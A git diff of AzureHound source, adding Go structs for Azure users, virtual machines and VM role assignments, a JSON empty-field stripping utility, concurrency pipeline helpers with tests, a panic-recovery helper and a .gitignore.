0000000..5612214 --- /dev/null +++ b/models/update-client-request.go @@ -0,0 +1,35 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +type UpdateClientRequest struct { + Address string `json:"address"` + Username string `json:"username"` + Hostname string `json:"hostname"` + Version string `json:"version"` + UserSid string `json:"usersid"` +} + +type UpdateClientResponse struct { + ID string `json:"id"` + Name string `json:"name"` + IPAddress string `json:"ip_address"` + Hostname string `json:"hostname"` + CurrentJobID int `json:"current_job_id"` + CurrentJob ClientJob `json:"current_job"` +} diff --git a/models/user.go b/models/user.go new file mode 100644 index 0000000..8582149 --- /dev/null +++ b/models/user.go @@ -0,0 +1,28 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import ( + "github.com/bloodhoundad/azurehound/v2/models/azure" +) + +type User struct { + azure.User + TenantId string `json:"tenantId"` + TenantName string `json:"tenantName"` +} diff --git a/models/utils.go b/models/utils.go new file mode 100644 index 0000000..0e0baf6 --- /dev/null +++ b/models/utils.go @@ -0,0 +1,65 @@ +package models + +import ( + "encoding/json" + "reflect" +) + +func OmitEmpty(raw json.RawMessage) (json.RawMessage, error) { + var data map[string]any + if err := json.Unmarshal(raw, &data); err != nil { + return nil, err + } else { + StripEmptyEntries(data) + return json.Marshal(data) + } +} + +func StripEmptyEntries(data map[string]any) { + for key, value := range data { + if isEmpty(reflect.ValueOf(value)) { + delete(data, key) + } else if nested, ok := value.(map[string]any); ok { // recursively strip nested maps + StripEmptyEntries(nested) + } else if slice, ok := value.([]any); ok { + value = make([]any, len(value.([]any))) + i := 0 + for _, item := range slice { + if mapValue, ok := item.(map[string]any); ok { + StripEmptyEntries(mapValue) + } + if !isEmpty(reflect.ValueOf(item)) { + value.([]any)[i] = item + i++ + } + } + value = value.([]any)[:i] + } + + // Strip top level if empty post recursive strip + if _, ok := data[key]; ok && isEmpty(reflect.ValueOf(value)) { + delete(data, key) + } + } +} + +func isEmpty(value reflect.Value) bool { + switch value.Kind() { + case reflect.Array, reflect.Map, reflect.Slice, reflect.String: + return value.Len() == 0 + case reflect.Bool: + return value.Bool() == false + case reflect.Float32, reflect.Float64: + return value.Float() == 0 + case reflect.Int, reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64: + return value.Int() == 0 + case reflect.Uint, reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64: + return value.Uint() == 0 + case reflect.Interface, reflect.Pointer: + return value.IsNil() + case reflect.Invalid: + return true + default: + return false + } +} diff --git a/models/utils_test.go b/models/utils_test.go new file mode 100644 index 0000000..ec3a7d1 --- /dev/null +++ b/models/utils_test.go @@ -0,0 +1,228 @@ +package models_test + +import ( + "encoding/json" + "testing" + + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/stretchr/testify/require" +) + +type Foo struct { + Bar string +} + +func TestStripEmptyEntries(t *testing.T) { + t.Run("should omit empty basic types", func(t *testing.T) { + var pointer *Foo + + data := map[string]any{ + "array": [0]any{}, + "map": map[string]any{}, + "slice": []any{}, + "string": "", + "bool": false, + "float32": float32(0), + "float64": float64(0), + "int": int(0), + "int8": int8(0), + "int16": int16(0), + "int32": int32(0), + "int64": int64(0), + "uint": uint(0), + "uint8": uint8(0), + "uint16": uint16(0), + "uint32": uint32(0), + "uint64": uint64(0), + "pointer": pointer, + "nil": nil, + } + + require.NotEmpty(t, data) + models.StripEmptyEntries(data) + require.Empty(t, data) + }) + + t.Run("should not omit non-empty basic types", func(t *testing.T) { + data := map[string]any{ + "array": [1]any{1}, + "map": map[any]any{"foo": "bar"}, + "slice": []any{1}, + "string": "foo", + "bool": true, + "float32": float32(1), + "float64": float64(1), + "int": int(1), + "int8": int8(1), + "int16": int16(1), + "int32": int32(1), + "int64": int64(1), + "uint": uint(1), + "uint8": uint8(1), + "uint16": uint16(1), + "uint32": uint32(1), + "uint64": uint64(1), + "pointer": &Foo{}, + } + + require.NotEmpty(t, data) + numKeys := len(data) + models.StripEmptyEntries(data) + require.NotEmpty(t, data) + require.Equal(t, numKeys, len(data)) + }) + + t.Run("should not omit empty struct types", func(t *testing.T) { + data := map[string]any{ + "struct": Foo{Bar: "baz"}, + } + + require.NotEmpty(t, data) + numKeys := len(data) + models.StripEmptyEntries(data) + require.NotEmpty(t, data) + require.Equal(t, numKeys, len(data)) + require.NotEmpty(t, data["struct"]) + require.Equal(t, data["struct"].(Foo).Bar, "baz") + }) + + t.Run("should recursively strip non-empty, nested map[string]any entries", func(t *testing.T) { + data := map[string]any{ + "empty": map[string]any{ + "false": false, + "emptystring": "", + "emptynest": map[string]any{ + "false": false, + "emptystring": "", + }, + }, + "nonempty": map[string]any{ + "emptyprop": 0, + "nonemptyprop": 1, + }, + } + + models.StripEmptyEntries(data) + require.Nil(t, data["empty"]) + require.NotNil(t, data["nonempty"]) + require.IsType(t, map[string]any{}, data["nonempty"]) + nested := data["nonempty"].(map[string]any) + require.Equal(t, 1, len(nested)) + require.Nil(t, nested["emptyprop"]) + require.Equal(t, 1, nested["nonemptyprop"]) + }) + + t.Run("should strip empty slice entries of type map[string]any", func(t *testing.T) { + data := map[string]any{ + "empty": []any{ + map[string]any{ + "false": false, + "emptystring": "", + }, + }, + "emptynestedslice": []any{ + map[string]any{ + "nestedslice": []any{ + map[string]any{ + "false": false, + "emptystring": "", + }, + }, + "emptystring": "", + }, + }, + "nonempty": []any{ + map[string]any{ + "emptyprop": 0, + "nonemptyprop": 1, + }, + }, + } + + models.StripEmptyEntries(data) + require.Nil(t, data["empty"]) + require.Nil(t, data["emptynestedslice"]) + require.NotNil(t, data["nonempty"]) + require.IsType(t, []any{}, data["nonempty"]) + slice := data["nonempty"].([]any) + require.IsType(t, map[string]any{}, slice[0]) + entry := slice[0].(map[string]any) + require.Nil(t, entry["emptyprop"]) + require.Equal(t, 1, entry["nonemptyprop"]) + }) +} + +func TestOmitEmpty(t *testing.T) { + t.Run("should omit empty basic types", func(t *testing.T) { + data := json.RawMessage(`{ + "string": "", + "number": 0, + "object": {}, + "array": [], + "boolean": false, + "null": null + }`) + + filtered, err := models.OmitEmpty(data) + require.Nil(t, err) + require.Equal(t, `{}`, string(filtered)) + }) + + t.Run("should not omit non-empty basic types except empty structs", func(t *testing.T) { + data := json.RawMessage(`{ + "string": "foo", + "number": 1, + "object": { "bar": "" }, + "array": [1], + "boolean": true + }`) + + filtered, err := models.OmitEmpty(data) + require.Nil(t, err) + require.Equal(t, `{"array":[1],"boolean":true,"number":1,"string":"foo"}`, string(filtered)) + }) + + t.Run("should omit empty struct/object types, just their empty properties", func(t *testing.T) { + data := json.RawMessage(`{ + "object": { "bar": "" } + }`) + + filtered, err := models.OmitEmpty(data) + require.Nil(t, err) + require.Equal(t, `{}`, string(filtered)) + }) + + t.Run("should recursively strip non-empty, nested object entries", func(t *testing.T) { + data := json.RawMessage(`{ + "empty": {}, + "nonempty": { + "emptyprop": 0, + "nonemptyprop": 1 + } + }`) + + filtered, err := models.OmitEmpty(data) + require.Nil(t, err) + require.Equal(t, `{"nonempty":{"nonemptyprop":1}}`, string(filtered)) + }) + + t.Run("should strip non-empty array entries of type object", func(t *testing.T) { + data := json.RawMessage(`{ + "empty": [], + "nonempty": [{ + "emptyprop": 0, + "nonemptyprop": 1 + }] + }`) + + filtered, err := models.OmitEmpty(data) + require.Nil(t, err) + require.Equal(t, `{"nonempty":[{"nonemptyprop":1}]}`, string(filtered)) + }) + + t.Run("should return an error", func(t *testing.T) { + invalidJson := json.RawMessage(`{]}`) + _, err := models.OmitEmpty(invalidJson) + require.Error(t, err) + }) +} diff --git a/models/virtual-machine-admin-login.go b/models/virtual-machine-admin-login.go new file mode 100644 index 0000000..8016879 --- /dev/null +++ b/models/virtual-machine-admin-login.go @@ -0,0 +1,30 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import "github.com/bloodhoundad/azurehound/v2/models/azure" + +type VirtualMachineAdminLogin struct { + AdminLogin azure.RoleAssignment `json:"adminLogin"` + VirtualMachineId string `json:"virtualMachineId"` +} + +type VirtualMachineAdminLogins struct { + AdminLogins []VirtualMachineAdminLogin `json:"adminLogins"` + VirtualMachineId string `json:"virtualMachineId"` +} diff --git a/models/virtual-machine-avere-contributor.go b/models/virtual-machine-avere-contributor.go new file mode 100644 index 0000000..8898b2c --- /dev/null +++ b/models/virtual-machine-avere-contributor.go @@ -0,0 +1,30 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import "github.com/bloodhoundad/azurehound/v2/models/azure" + +type VirtualMachineAvereContributor struct { + AvereContributor azure.RoleAssignment `json:"avereContributor"` + VirtualMachineId string `json:"virtualMachineId"` +} + +type VirtualMachineAvereContributors struct { + AvereContributors []VirtualMachineAvereContributor `json:"avereContributors"` + VirtualMachineId string `json:"virtualMachineId"` +} diff --git a/models/virtual-machine-contributor.go b/models/virtual-machine-contributor.go new file mode 100644 index 0000000..79492ad --- /dev/null +++ b/models/virtual-machine-contributor.go @@ -0,0 +1,30 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import "github.com/bloodhoundad/azurehound/v2/models/azure" + +type VirtualMachineContributor struct { + Contributor azure.RoleAssignment `json:"contributor"` + VirtualMachineId string `json:"virtualMachineId"` +} + +type VirtualMachineContributors struct { + Contributors []VirtualMachineContributor `json:"contributors"` + VirtualMachineId string `json:"virtualMachineId"` +} diff --git a/models/virtual-machine-owner.go b/models/virtual-machine-owner.go new file mode 100644 index 0000000..d251188 --- /dev/null +++ b/models/virtual-machine-owner.go @@ -0,0 +1,30 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import "github.com/bloodhoundad/azurehound/v2/models/azure" + +type VirtualMachineOwner struct { + Owner azure.RoleAssignment `json:"owner"` + VirtualMachineId string `json:"virtualMachineId"` +} + +type VirtualMachineOwners struct { + Owners []VirtualMachineOwner `json:"owners"` + VirtualMachineId string `json:"virtualMachineId"` +} diff --git a/models/virtual-machine-role-assignment.go b/models/virtual-machine-role-assignment.go new file mode 100644 index 0000000..51fdf6e --- /dev/null +++ b/models/virtual-machine-role-assignment.go @@ -0,0 +1,30 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import "github.com/bloodhoundad/azurehound/v2/models/azure" + +type VirtualMachineRoleAssignment struct { + RoleAssignment azure.RoleAssignment `json:"roleAssignment"` + VirtualMachineId string `json:"virtualMachineId"` +} + +type VirtualMachineRoleAssignments struct { + RoleAssignments []VirtualMachineRoleAssignment `json:"roleAssignments"` + VirtualMachineId string `json:"virtualMachineId"` +} diff --git a/models/virtual-machine-user-access-admin.go b/models/virtual-machine-user-access-admin.go new file mode 100644 index 0000000..b282599 --- /dev/null +++ b/models/virtual-machine-user-access-admin.go @@ -0,0 +1,30 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import "github.com/bloodhoundad/azurehound/v2/models/azure" + +type VirtualMachineUserAccessAdmin struct { + UserAccessAdmin azure.RoleAssignment `json:"userAccessAdmin"` + VirtualMachineId string `json:"virtualMachineId"` +} + +type VirtualMachineUserAccessAdmins struct { + UserAccessAdmins []VirtualMachineUserAccessAdmin `json:"userAccessAdmins"` + VirtualMachineId string `json:"virtualMachineId"` +} diff --git a/models/virtual-machine-vmcontributor.go b/models/virtual-machine-vmcontributor.go new file mode 100644 index 0000000..56baca3 --- /dev/null +++ b/models/virtual-machine-vmcontributor.go @@ -0,0 +1,30 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import "github.com/bloodhoundad/azurehound/v2/models/azure" + +type VirtualMachineVMContributor struct { + VMContributor azure.RoleAssignment `json:"vmContributor"` + VirtualMachineId string `json:"virtualMachineId"` +} + +type VirtualMachineVMContributors struct { + VMContributors []VirtualMachineVMContributor `json:"vmContributors"` + VirtualMachineId string `json:"virtualMachineId"` +} diff --git a/models/virtual-machine.go b/models/virtual-machine.go new file mode 100644 index 0000000..e293561 --- /dev/null +++ b/models/virtual-machine.go @@ -0,0 +1,27 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import "github.com/bloodhoundad/azurehound/v2/models/azure" + +type VirtualMachine struct { + azure.VirtualMachine + SubscriptionId string `json:"subscriptionId"` + ResourceGroupId string `json:"resourceGroupId"` + TenantId string `json:"tenantId"` +} diff --git a/models/vm-scale-set.go b/models/vm-scale-set.go new file mode 100644 index 0000000..4c392ba --- /dev/null +++ b/models/vm-scale-set.go @@ -0,0 +1,27 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import "github.com/bloodhoundad/azurehound/v2/models/azure" + +type VMScaleSet struct { + azure.VMScaleSet + SubscriptionId string `json:"subscriptionId"` + ResourceGroupId string `json:"resourceGroupId"` + TenantId string `json:"tenantId"` +} diff --git a/models/web-app.go b/models/web-app.go new file mode 100644 index 0000000..46be3c7 --- /dev/null +++ b/models/web-app.go @@ -0,0 +1,28 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import "github.com/bloodhoundad/azurehound/v2/models/azure" + +type WebApp struct { + azure.WebApp + SubscriptionId string `json:"subscriptionId"` + ResourceGroupId string `json:"resourceGroupId"` + ResourceGroupName string `json:"resourceGroupName"` + TenantId string `json:"tenantId"` +} diff --git a/panicrecovery/panic_recovery.go b/panicrecovery/panic_recovery.go new file mode 100644 index 0000000..3cbd757 --- /dev/null +++ b/panicrecovery/panic_recovery.go @@ -0,0 +1,33 @@ +package panicrecovery + +import ( + "context" + "fmt" + "runtime/debug" + + "github.com/go-logr/logr" +) + +var PanicChan = make(chan error) + +// handleBubbledPanic receives errors from panicChan, then it will print them and stop() context. +func HandleBubbledPanic(ctx context.Context, stop context.CancelFunc, log logr.Logger) { + go func() { + for { + select { + case err := <-PanicChan: + log.V(0).Error(err, "") + stop() + case <-ctx.Done(): + return + } + } + }() +} + +// panicRecovery recovers from panics and sends them to panicChan +func PanicRecovery() { + if recovery := recover(); recovery != nil { + PanicChan <- fmt.Errorf("[panic recovery] %s - [stack trace] %s", recovery, debug.Stack()) + } +} diff --git a/pipeline/pipeline.go b/pipeline/pipeline.go new file mode 100644 index 0000000..d4b4df5 --- /dev/null +++ b/pipeline/pipeline.go @@ -0,0 +1,276 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package pipeline + +import ( + "encoding/json" + "reflect" + "sync" + "time" + + "github.com/bloodhoundad/azurehound/v2/internal" +) + +type Result[T any] struct { + Error error + Ok T +} + +// Send sends a value to a channel while monitoring the done channel for cancellation +func Send[D, T any](done <-chan D, tgt chan<- T, val T) bool { + select { + case tgt <- val: + return true + case <-done: + return false + } +} + +// SendAny sends a value to an any channel while monitoring the done channel for cancellation +func SendAny[T any](done <-chan T, tgt chan<- any, val any) bool { + select { + case tgt <- val: + return true + case <-done: + return false + } +} + +// OrDone provides an explicit cancellation mechanism to ensure the encapsulated and downstream goroutines are cleaned +// up. This frees the caller from depending on the input channel to close in order to free the goroutine, thus +// preventing possible leaks. +func OrDone[D, T any](done <-chan D, in <-chan T) <-chan T { + out := make(chan T) + + go func() { + defer close(out) + for { + select { + case <-done: + return + case val, ok := <-in: + if !ok { + return + } else { + select { + case out <- val: + case <-done: + } + } + } + } + }() + return out +} + +// Mux joins multiple channels and returns a channel as single stream of data. +func Mux[D any](done <-chan D, channels ...<-chan any) <-chan any { + var wg sync.WaitGroup + out := make(chan interface{}) + + muxer := func(channel <-chan any) { + defer wg.Done() + for item := range OrDone(done, channel) { + if ok := Send(done, out, item); !ok { + return + } + } + } + + wg.Add(len(channels)) + for _, channel := range channels { + go muxer(channel) + } + + go func() { + wg.Wait() + close(out) + }() + + return out +} + +// Demux distributes the stream of data from a single channel across multiple channels to parallelize CPU use and I/O +func Demux[D, T any](done <-chan D, in <-chan T, size int) []<-chan T { + outputs := make([]chan T, size) + + for i := range outputs { + outputs[i] = make(chan T) + } + + closeOutputs := func() { + for i := range outputs { + close(outputs[i]) + } + } + + cases := internal.Map(outputs, func(out chan T) reflect.SelectCase { + return reflect.SelectCase{ + Dir: reflect.SelectSend, + Chan: reflect.ValueOf(out), + } + }) + + go func() { + defer closeOutputs() + for item := range OrDone(done, in) { + // send item to exactly one channel + for i := range cases { + cases[i].Send = reflect.ValueOf(item) + } + reflect.Select(cases) + } + }() + + return internal.Map(outputs, func(out chan T) <-chan T { return out }) +} + +func ToAny[D, T any](done <-chan D, in <-chan T) <-chan any { + return Map(done, in, func(t T) any { + return any(t) + }) +} + +func Map[D, T, U any](done <-chan D, in <-chan T, fn func(T) U) <-chan U { + out := make(chan U) + go func() { + defer close(out) + for item := range OrDone(done, in) { + if ok := Send(done, out, fn(item)); !ok { + return + } + } + }() + return out +} + +func Filter[D, T any](done <-chan D, in <-chan T, fn func(T) bool) <-chan T { + out := make(chan T) + go func() { + defer close(out) + for item := range OrDone(done, in) { + if fn(item) { + if ok := Send(done, out, item); !ok { + return + } + } + } + }() + return out +} + +// Tee copies the stream of data from a single channel to zero or more channels +func Tee[D, T any](done <-chan D, in <-chan T, outputs ...chan T) { + go func() { + // Need to close outputs when goroutine exits to ensure we avoid deadlock + defer func() { + for i := range outputs { + close(outputs[i]) + } + }() + + for item := range OrDone(done, in) { + for _, out := range outputs { + select { + case out <- item: + case <-done: + return + } + } + } + }() +} + +func TeeFixed[D, T any](done <-chan D, in <-chan T, size int) []<-chan T { + out := internal.Map(make([]any, size), func(_ any) chan T { + return make(chan T) + }) + Tee(done, in, out...) + return internal.Map(out, func(c chan T) <-chan T { + return c + }) +} + +func Batch[D, T any](done <-chan D, in <-chan T, maxItems int, maxTimeout time.Duration) <-chan []T { + out := make(chan []T) + + go func() { + defer close(out) + + timeout := time.After(maxTimeout) + var batch []T + for { + select { + case <-done: + return + case item, ok := <-in: + if !ok { + if len(batch) > 0 { + if ok = Send(done, out, batch); !ok { + return + } + batch = nil + } + return + } else { + // Add to batch + batch = append(batch, item) + + // Flush if limit is reached + if len(batch) >= maxItems { + if ok = Send(done, out, batch); !ok { + return + } + batch = nil + timeout = time.After(maxTimeout) + } + } + case <-timeout: + if len(batch) > 0 { + if ok := Send(done, out, batch); !ok { + return + } + batch = nil + } + timeout = time.After(maxTimeout) + } + } + }() + + return out +} + +func FormatJson[D, T any](done <-chan D, in <-chan T) <-chan string { + out := make(chan string) + + go func() { + defer close(out) + + for item := range OrDone(done, in) { + if bytes, err := json.Marshal(item); err != nil { + panic(err) + } else { + if ok := Send(done, out, string(bytes)); !ok { + return + } + } + } + }() + + return out +} diff --git a/pipeline/pipeline_test.go b/pipeline/pipeline_test.go new file mode 100644 index 0000000..07c3617 --- /dev/null +++ b/pipeline/pipeline_test.go @@ -0,0 +1,106 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package pipeline_test + +import ( + "fmt" + "sync" + "testing" + "time" + + "github.com/bloodhoundad/azurehound/v2/pipeline" +) + +func TestBatch(t *testing.T) { + + done := make(chan interface{}) + in := make(chan string) + + go func() { + in <- "foo" + in <- "bar" + + in <- "bazz" + time.Sleep(5 * time.Millisecond) + + in <- "buzz" + + close(in) + }() + + batches := map[int]int{} + i := 0 + for batch := range pipeline.Batch(done, in, 2, 5*time.Millisecond) { + batches[i] = len(batch) + i++ + fmt.Println(batch) + } + + if len(batches) != 3 { + t.Errorf("got %v, want %v", len(batches), 3) + } + + if length, ok := batches[0]; !ok || length != 2 { + t.Errorf("got %v, want %v", length, 2) + } + + if length, ok := batches[1]; !ok || length != 1 { + t.Errorf("got %v, want %v", length, 1) + } + + if length, ok := batches[2]; !ok || length != 1 { + t.Errorf("got %v, want %v", length, 1) + } +} + +func TestDemux(t *testing.T) { + + var ( + done = make(chan interface{}) + in = make(chan string) + wg sync.WaitGroup + count int + ) + + go func() { + defer close(in) + in <- "foo" + in <- "bar" + in <- "bazz" + in <- "buzz" + }() + + outs := pipeline.Demux(done, in, 2) + wg.Add(len(outs)) + for i := range outs { + out := outs[i] + go func() { + defer wg.Done() + for s := range out { + fmt.Println(s) + count++ + } + }() + } + + wg.Wait() + if count != 4 { + t.Fail() + } + +} diff --git a/sec.gitignore b/sec.gitignore new file mode 100644 index 0000000..458aa00 --- /dev/null +++ b/sec.gitignore @@ -0,0 +1,234 @@ +################ +# Project Settings +################################ + +# The binary file for darwin and linux +azurehound + +*.json* + +################ +# Boilerplate Settings (modify as needed) +# (https://github.com/github/gitignore) +################################ + +######## +# Go +################ + +# Binaries for programs and plugins +*.exe +*.exe~ +*.dll +*.so +*.dylib + +# Test binary, built with `go test -c` +*.test + +# Output of the go coverage tool, specifically when used with LiteIDE +*.out + +# Dependency directories (remove the comment below to include it) +# vendor/ + +# Go workspace file +go.work + +######## +# Linux +################ + +*~ + +# temporary files which can be created if a process still has a handle open of a deleted file +.fuse_hidden* + +# KDE directory preferences +.directory + +# Linux trash folder which might appear on any partition or disk +.Trash-* + +# .nfs files are created when an open file is removed but is still being accessed +.nfs* + +######## +# MacOS +################ + +# General +.DS_Store +.AppleDouble +.LSOverride + +# Icon must end with two \r +Icon + +# Thumbnails +._* + +# Files that might appear in the root of a volume +.DocumentRevisions-V100 +.fseventsd +.Spotlight-V100 +.TemporaryItems +.Trashes +.VolumeIcon.icns +.com.apple.timemachine.donotpresent + +# Directories potentially created on remote AFP share +.AppleDB +.AppleDesktop +Network Trash Folder +Temporary Items +.apdisk + +######## +# Windows +################ + +# Windows thumbnail cache files +Thumbs.db +Thumbs.db:encryptable +ehthumbs.db +ehthumbs_vista.db + +# Dump file +*.stackdump + +# Folder config file +[Dd]esktop.ini + +# Recycle Bin used on file shares +$RECYCLE.BIN/ + +# Windows Installer files +*.cab +*.msi +*.msix +*.msm +*.msp + +# Windows shortcuts +*.lnk + +######## +# JetBrains +################ + +# User-specific stuff +.idea/**/workspace.xml +.idea/**/tasks.xml +.idea/**/usage.statistics.xml +.idea/**/dictionaries +.idea/**/shelf + +# AWS User-specific +.idea/**/aws.xml + +# Generated files +.idea/**/contentModel.xml + +# Sensitive or high-churn files +.idea/**/dataSources/ +.idea/**/dataSources.ids +.idea/**/dataSources.local.xml +.idea/**/sqlDataSources.xml +.idea/**/dynamic.xml +.idea/**/uiDesigner.xml +.idea/**/dbnavigator.xml + +# Gradle +.idea/**/gradle.xml +.idea/**/libraries + +# Gradle and Maven with auto-import +# When using Gradle or Maven with auto-import, you should exclude module files, +# since they will be recreated, and may cause churn. Uncomment if using +# auto-import. +# .idea/artifacts +# .idea/compiler.xml +# .idea/jarRepositories.xml +# .idea/modules.xml +# .idea/*.iml +# .idea/modules +# *.iml +# *.ipr + +# CMake +cmake-build-*/ + +# Mongo Explorer plugin +.idea/**/mongoSettings.xml + +# File-based project format +*.iws + +# IntelliJ +out/ + +# mpeltonen/sbt-idea plugin +.idea_modules/ + +# JIRA plugin +atlassian-ide-plugin.xml + +# Cursive Clojure plugin +.idea/replstate.xml + +# SonarLint plugin +.idea/sonarlint/ + +# Crashlytics plugin (for Android Studio and IntelliJ) +com_crashlytics_export_strings.xml +crashlytics.properties +crashlytics-build.properties +fabric.properties + +# Editor-based Rest Client +.idea/httpRequests + +# Android studio 3.1+ serialized cache file +.idea/caches/build_file_checksums.ser + +######## +# Vim +################ + +# Swap +[._]*.s[a-v][a-z] +!*.svg # comment out if you don't need vector files +[._]*.sw[a-p] +[._]s[a-rt-v][a-z] +[._]ss[a-gi-z] +[._]sw[a-p] + +# Session +Session.vim +Sessionx.vim + +# Temporary +.netrwhist +*~ +# Auto-generated tag files +tags +# Persistent undo +[._]*.un~ + +######## +# Visual Studio Code +################ + +.vscode/* 